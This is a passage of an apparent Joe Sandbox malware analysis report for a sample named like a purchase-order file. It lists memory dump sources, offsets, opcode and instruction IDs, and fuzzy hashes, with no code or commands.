                                                          • Instruction Fuzzy Hash: D6F0583AF04208CBCB18DFA9F8804DCF3B3FBC8326B24C163C10992619E73055168B51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f65bc82b013368ba68f9a7d80175ec044b14e3eaec65f8b67d7c28aa1b777cf
                                                          • Instruction ID: 84c99699ce8f6ba28b434faa165c8c952c1ce9e872946d1b134333b553c700c2
                                                          • Opcode Fuzzy Hash: 2f65bc82b013368ba68f9a7d80175ec044b14e3eaec65f8b67d7c28aa1b777cf
                                                          • Instruction Fuzzy Hash: E6011D70908298CFEB64CF18C884BD97BB1BB49305F5494E9D40DA7344DBB459C4CF46
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 278eac62079b1bfb7244e26dd8ee191f4c2577548d12dd59c758656a994a0fa9
                                                          • Instruction ID: d748f38a118f536178cbf2da65d30b6959f9bcc76ad382aad6eb60af2c216757
                                                          • Opcode Fuzzy Hash: 278eac62079b1bfb7244e26dd8ee191f4c2577548d12dd59c758656a994a0fa9
                                                          • Instruction Fuzzy Hash: 9FF0A074906108EFC704DFA8D442BADBBF8EB48300F14C0AAD80893341CA31AA42DB81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 36d1b76e2c3cf2ab7410c1557f4122d9dc7d73f0f697f20b9dc3da7e9ff5f2cc
                                                          • Instruction ID: dc5675dad95f22cea469f9f09bb1efc695ac4db3ec9067a97b0ea6d8d282c1ce
                                                          • Opcode Fuzzy Hash: 36d1b76e2c3cf2ab7410c1557f4122d9dc7d73f0f697f20b9dc3da7e9ff5f2cc
                                                          • Instruction Fuzzy Hash: E0F082325196C09FE716DB64CC4EA08BFB0EF56315F2A40EBE085CF2A3D626D806CB11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9eec16ed0a010170859a726bdf037ee8a0747a62d241ad5a7324cf96e471816
                                                          • Instruction ID: 4b11fdab75d86594c3f1b13519eeba226151143196e6c7f0ee5408868f1043e0
                                                          • Opcode Fuzzy Hash: f9eec16ed0a010170859a726bdf037ee8a0747a62d241ad5a7324cf96e471816
                                                          • Instruction Fuzzy Hash: 1001DA78910218DFDB68DF18D858AD9B7B1FB88340F0080D6E54DA3354DB749E85DF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fabbcda9d889e8910b532ea3c1a3ffc51af9098d7d36e0dc965178faa2c4356c
                                                          • Instruction ID: 57f5bf4aebdb3e193f32363d9bb86847e8649479a3624be51ce318722685f53c
                                                          • Opcode Fuzzy Hash: fabbcda9d889e8910b532ea3c1a3ffc51af9098d7d36e0dc965178faa2c4356c
                                                          • Instruction Fuzzy Hash: C2F08C3AB04208CBCB24DFA8F8804DCF3B2FB88326B24C562C50993608D73055198B51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 16912e42b70d4f11386c453e9d7398102e73560b50f471b46ae1d20172816b3b
                                                          • Instruction ID: 40e9969ad9f8faf6ccc301cea06407178ae8142913931000b371a6a3d882c8b4
                                                          • Opcode Fuzzy Hash: 16912e42b70d4f11386c453e9d7398102e73560b50f471b46ae1d20172816b3b
                                                          • Instruction Fuzzy Hash: D4F01575D05208EBCB15DFB9C941BADBBB9EB48300F10C4AAA944A2300D67A9A41DF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 464ddc0e5471c98fa8a36bde865f2dcca45fba7a07dc32edcfdc2c8c5b11d2d7
                                                          • Instruction ID: 219b78a9c1e37bff5bddee9a69ee5e0da8c323cc4f54e47213f2320bcac83766
                                                          • Opcode Fuzzy Hash: 464ddc0e5471c98fa8a36bde865f2dcca45fba7a07dc32edcfdc2c8c5b11d2d7
                                                          • Instruction Fuzzy Hash: 8FF019B0E10248CFDB0CDF59D495B9CBBF2EF89310F548096E409A7254CA346D81CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4e7c934b5f28e671ae60cb61d6b89776c4686867672f61cac5b2604e40850ac4
                                                          • Instruction ID: 922e533af093056b167fcba2c9f286b151d105d534f0b1db29fa0ef77831ca55
                                                          • Opcode Fuzzy Hash: 4e7c934b5f28e671ae60cb61d6b89776c4686867672f61cac5b2604e40850ac4
                                                          • Instruction Fuzzy Hash: 39F04F70E102188BDB0DEF68D8597DDBBB2FB89300F408499E049A7245CF742D84CB41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0fad87f59f7fea1decc1d140b6d6658b9f8fbab0ba22df4d122f2870e0857aea
                                                          • Instruction ID: 23a4d56f9306b18b20b55efae2617423a2ea14a629bdc0565ebc04c4ae75ff53
                                                          • Opcode Fuzzy Hash: 0fad87f59f7fea1decc1d140b6d6658b9f8fbab0ba22df4d122f2870e0857aea
                                                          • Instruction Fuzzy Hash: 03E09234806208EBC700EBBCD5063A8BBB9EB05601F1044E9840896341E7718981CB92
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 58c618a99605aa3c7cff2b20453895cc2d6c85b71341a4bd06e483746daa792b
                                                          • Instruction ID: 457d117479256b680f2870282a2d17bfffb56bcbf8b52d5443c16e17fab861aa
                                                          • Opcode Fuzzy Hash: 58c618a99605aa3c7cff2b20453895cc2d6c85b71341a4bd06e483746daa792b
                                                          • Instruction Fuzzy Hash: 17F01C74D08208EFCB81DFE9C850AADBBF8EB48310F14C49AE859D3341DA359A51DF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0a699ac9676ba94865ea68b8e1e7aa67c0740dd962b7d29cf4d6f50d64783362
                                                          • Instruction ID: 22faed6f26cdee866b3c1af41f06724764afef769c13ddec61f353a26d73c147
                                                          • Opcode Fuzzy Hash: 0a699ac9676ba94865ea68b8e1e7aa67c0740dd962b7d29cf4d6f50d64783362
                                                          • Instruction Fuzzy Hash: F6E09271904208DFC740DFB8D889BA87BF8FB08204F2048E5D809E3721E635DD40CB50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c4475e8d40dd0f6046f7b4011c876701b74b72d0ce3074413c12c5a4862793ba
                                                          • Instruction ID: 6d790c41a38b87628267885f0ef1637b81a5458a8cd350bd5ac23203966f2ef6
                                                          • Opcode Fuzzy Hash: c4475e8d40dd0f6046f7b4011c876701b74b72d0ce3074413c12c5a4862793ba
                                                          • Instruction Fuzzy Hash: A101EF78A01228DFDB68DF18D884BC9B7B1FF09300F1080DAE449A3340CB345A80CF81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1d20c8b3d382bcd46f8ff0f1446c07198cf89862d9058c0e6cbafb00cf175bf4
                                                          • Instruction ID: de0bf04722d938dff362ff1c43dda166b0d9d236fde7e7ba312b569f410b585d
                                                          • Opcode Fuzzy Hash: 1d20c8b3d382bcd46f8ff0f1446c07198cf89862d9058c0e6cbafb00cf175bf4
                                                          • Instruction Fuzzy Hash: A8F03A30E05318CBDB15DF69C8443EEB7FAFF88340F0084A5900DAB214D6744941CF10
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 35d9840a441e88dca6cea82ca549cd4bacf53d0af593e85b69f318b1f33df637
                                                          • Instruction ID: af7cea3b397349a596602328dee3476c2dc1af5fc48cb4cb4f80f5e00a3e7353
                                                          • Opcode Fuzzy Hash: 35d9840a441e88dca6cea82ca549cd4bacf53d0af593e85b69f318b1f33df637
                                                          • Instruction Fuzzy Hash: CCF03035905208EFCB45DFA8C845AA97BB5EF09311F4081E5E84567361D631AE50DB50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3083344f7a764798222f85bcbfc5e2282c0d2e982c4f35615bb951f58e344bb4
                                                          • Instruction ID: 519dc7d05258f9622f523e41076b8355daf46f935385853231844220a3680a91
                                                          • Opcode Fuzzy Hash: 3083344f7a764798222f85bcbfc5e2282c0d2e982c4f35615bb951f58e344bb4
                                                          • Instruction Fuzzy Hash: D6F01C70D45208EFC754DFB8D4412EDBBF4EB45210F5080EAD844A3351D6799A45CF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9c7d0621936ebfb38582967850424f139395e6ebe27576fb28384b6629c2e9da
                                                          • Instruction ID: 2a352a2e5f31e1cdd6158dfd65158a968fb6df1064cddbf99acf0a17a6c66945
                                                          • Opcode Fuzzy Hash: 9c7d0621936ebfb38582967850424f139395e6ebe27576fb28384b6629c2e9da
                                                          • Instruction Fuzzy Hash: D6014F74E21204CFE708CF14E499B9DBBF2FB48354F1080D5E849A3651CB74A980CF01
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d0b740054bbebeb75dda1a30b295c08cdd6f7c43f4a70d952c321b2f1affa5e8
                                                          • Instruction ID: 6e252913bf471736bcb1cf28a5b9a6439b863a84c41186b7d55a123ac4375aa3
                                                          • Opcode Fuzzy Hash: d0b740054bbebeb75dda1a30b295c08cdd6f7c43f4a70d952c321b2f1affa5e8
                                                          • Instruction Fuzzy Hash: 23F0393AB04208CBDB14DFA8F8805DCF3B2EBC832AF24C173C51993618D73195169B61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2894ec0cd1dd52abf41f791bb83537300cb0973babddbbf972641e8269707b65
                                                          • Instruction ID: 3826fedaefae44317808e81edc1b8eb75651276cf569cd60559a94d2e4733a08
                                                          • Opcode Fuzzy Hash: 2894ec0cd1dd52abf41f791bb83537300cb0973babddbbf972641e8269707b65
                                                          • Instruction Fuzzy Hash: 16F03934905208ABDB09DFA8D942BADBBB4EB48310F14C4AE984893341CB319A42CB82
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: da2082d20b162ce22e63a58a92feb8c3413a070e5b058749689bcd50d88ad4ce
                                                          • Instruction ID: 2e5293ed7c2d0bf55c1bb2355fa6a230656dc466a58903f1b9957d9fe443a1bb
                                                          • Opcode Fuzzy Hash: da2082d20b162ce22e63a58a92feb8c3413a070e5b058749689bcd50d88ad4ce
                                                          • Instruction Fuzzy Hash: 56E09274A49108ABD701EEA8DC417ADBB79E744310F1088ADDC0967381C735A9479BA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fad8254bcfb131f5766ca254d5f20ace0ef854c632d1a87e6330d8c4b63e205b
                                                          • Instruction ID: 22062f6cb169575f7c9b193df188f00b0bbffb8ec998291855e21246dd6d0d06
                                                          • Opcode Fuzzy Hash: fad8254bcfb131f5766ca254d5f20ace0ef854c632d1a87e6330d8c4b63e205b
                                                          • Instruction Fuzzy Hash: 77F06531E04218AFCB19DF58D0497DDBFF7EB84220F048099E40A93280DF742B85CB84
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 964da6829e98d15649d2acfb8d64e49ed89450c0359f01b443cd78a275efc3d1
                                                          • Instruction ID: b9e8703f3f2c566b5fc781e0c793001d43a2f92c780ae4ccf24814cb9709f824
                                                          • Opcode Fuzzy Hash: 964da6829e98d15649d2acfb8d64e49ed89450c0359f01b443cd78a275efc3d1
                                                          • Instruction Fuzzy Hash: 99F03074D04108DFCB44DFE8D8457ADBBF4EB88310F14C4AAD819A7340DA355A41CF81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b39d4fe32ed2716da57a7d1894e4c5dab66eba7e8395b480640bdd6abbf0602a
                                                          • Instruction ID: c327970763b9a51dbbd1a1bf2c63772597e39e3e59d58209335677b75fed6598
                                                          • Opcode Fuzzy Hash: b39d4fe32ed2716da57a7d1894e4c5dab66eba7e8395b480640bdd6abbf0602a
                                                          • Instruction Fuzzy Hash: 80F03074D05208AFC741EFF9D0496ECBBF4EB48200F008899D845A3351D6749E40CF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d72cfe1b4f1656ffcf960f7d577cf7a93f45016942809df85ea58ed94cfdc8d2
                                                          • Instruction ID: da1a36f72da692d1b3d7bc14ad1032e9420822f20d835b7edd127872aa7640b2
                                                          • Opcode Fuzzy Hash: d72cfe1b4f1656ffcf960f7d577cf7a93f45016942809df85ea58ed94cfdc8d2
                                                          • Instruction Fuzzy Hash: 0CE0127120020557C7149A2AE884C5BFB9ADFD4364710DA39F11A87625DE74AD458690
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 574693ed5ceffe450a0ebf6d06d1f8a605715d2629911760b9ad7f49dd45afcc
                                                          • Instruction ID: bad041480712ce587f680fd1db03e6f7948ddf5592773cec40f07ffd2a7db0f1
                                                          • Opcode Fuzzy Hash: 574693ed5ceffe450a0ebf6d06d1f8a605715d2629911760b9ad7f49dd45afcc
                                                          • Instruction Fuzzy Hash: C0F0C074E05508EFC754EFB9D94579DBBB5EB88310F14C4DAD818A3351EA355A41CF80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8021967af49ce3e4fad8216d59559cd57ec7e01fe5c5b5cfbca75cd97a0893e9
                                                          • Instruction ID: ea9c867dc91812e2369df0e1829f0e7e91e917eb25e6ecb3f60ddf5e950115c8
                                                          • Opcode Fuzzy Hash: 8021967af49ce3e4fad8216d59559cd57ec7e01fe5c5b5cfbca75cd97a0893e9
                                                          • Instruction Fuzzy Hash: 20F06574949148AFCB15DFA9C4816ACBFB4EF45305F18C4EEDC4457382C6359A41CF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4b8e01f5d764dd5455d09c7eb53b4b83ea051ef513a43f33ba954432c0e20408
                                                          • Instruction ID: f25a50b9d0595bf9d3e378ddb2b20b064a36c375d10bfb9d5730b67f962e93a4
                                                          • Opcode Fuzzy Hash: 4b8e01f5d764dd5455d09c7eb53b4b83ea051ef513a43f33ba954432c0e20408
                                                          • Instruction Fuzzy Hash: FDE06D308481089BCB01CFA8D5517ACBBB5EB49300F14C1DED86993341C63A8A02DF41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c32905fbb8165e6065d83cf74159ce24197e0a20ab46e422b89584c7f10c8911
                                                          • Instruction ID: 0555ee25ff1c4047b30c23cebb11dcfd036c9eae38d87415c3e1f65593d9b442
                                                          • Opcode Fuzzy Hash: c32905fbb8165e6065d83cf74159ce24197e0a20ab46e422b89584c7f10c8911
                                                          • Instruction Fuzzy Hash: 55E0923850D208DBCB01DFA8DD816ADBB78EB4A314F1485EAC8485B342C675AE06DB90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5fd7ca3ba157ff948abd6c20d220d7618019f906cdf8fda1714928e97c1c184c
                                                          • Instruction ID: 6caae6462f52cfa8666d03f9dda5bdbd188de395219c5eba367aa6d067ff3b8b
                                                          • Opcode Fuzzy Hash: 5fd7ca3ba157ff948abd6c20d220d7618019f906cdf8fda1714928e97c1c184c
                                                          • Instruction Fuzzy Hash: D2E09A38A09204DBCB01EF94DA80BADBB71EB49320F14C0A9D80827351C6369E56DB90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe28fa876e37a1b8a2f7cb38115bd9339d33d7450424ab07250e697bb0e97e30
                                                          • Instruction ID: ab18e5d9cadf142de7dad9a3fcc30c3d14e47b8f220f763f64e16fa8da262ea1
                                                          • Opcode Fuzzy Hash: fe28fa876e37a1b8a2f7cb38115bd9339d33d7450424ab07250e697bb0e97e30
                                                          • Instruction Fuzzy Hash: 8BE04F71805208DFCB40EFB8D44A7AC7FF8E704215F1188A5D848A3350E6759E418B95
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: df1ac040e4e19b8e4ff74f144f1b9a9f2d90aef810204fd0d0de7cdba6dbf237
                                                          • Instruction ID: 7b1b4a915419ae06e888c2c565c9385eb74d3545add1136eb9d3b37c96218dcd
                                                          • Opcode Fuzzy Hash: df1ac040e4e19b8e4ff74f144f1b9a9f2d90aef810204fd0d0de7cdba6dbf237
                                                          • Instruction Fuzzy Hash: 98F0C970E45259CFDB58CF59C844BA8BBF6FB4D3A0F1091A5D809A7214DF74A940CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8d6c344f8a51a8028d018ff4e06932b57dd4bba81cf6c800d0203b7e8ac40dda
                                                          • Instruction ID: 56170926e36d9ecfd0114b55b6e4e033fbfa8d68f147aeeceba47ffbe686aad4
                                                          • Opcode Fuzzy Hash: 8d6c344f8a51a8028d018ff4e06932b57dd4bba81cf6c800d0203b7e8ac40dda
                                                          • Instruction Fuzzy Hash: 64E0CD3500A104E7C700C67AC842769BBADDB07709F5480DD9C0457341DA729D42C751
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 15c5c1d79b6601ff2962b6cd9bf2b8a465db84fa2dd2e8afa72d2cc8a4e3e361
                                                          • Instruction ID: 07d7cd0d3a9eaec75b3cd1b7dc5c1586fe6b0ceb5b05aae22cf19c98e4923360
                                                          • Opcode Fuzzy Hash: 15c5c1d79b6601ff2962b6cd9bf2b8a465db84fa2dd2e8afa72d2cc8a4e3e361
                                                          • Instruction Fuzzy Hash: 8FE0ED74905208EFCB44DF98D540AADBFB9EB88310F10C0EAEC5897341D7359A51DF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4a622b7e8643b6bd0b3e92acbfe98976979577fc303e8ea1ad61b9a0202d0292
                                                          • Instruction ID: 3f76643cb4797cbb026968fbf6dd27b71f58e6cc36e94badd84a3e7a9a466285
                                                          • Opcode Fuzzy Hash: 4a622b7e8643b6bd0b3e92acbfe98976979577fc303e8ea1ad61b9a0202d0292
                                                          • Instruction Fuzzy Hash: 07F0D470D05288CFEB19DFA9D545A9DBBF2EB88300F5081AAD44AA7259D6709A80CF11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
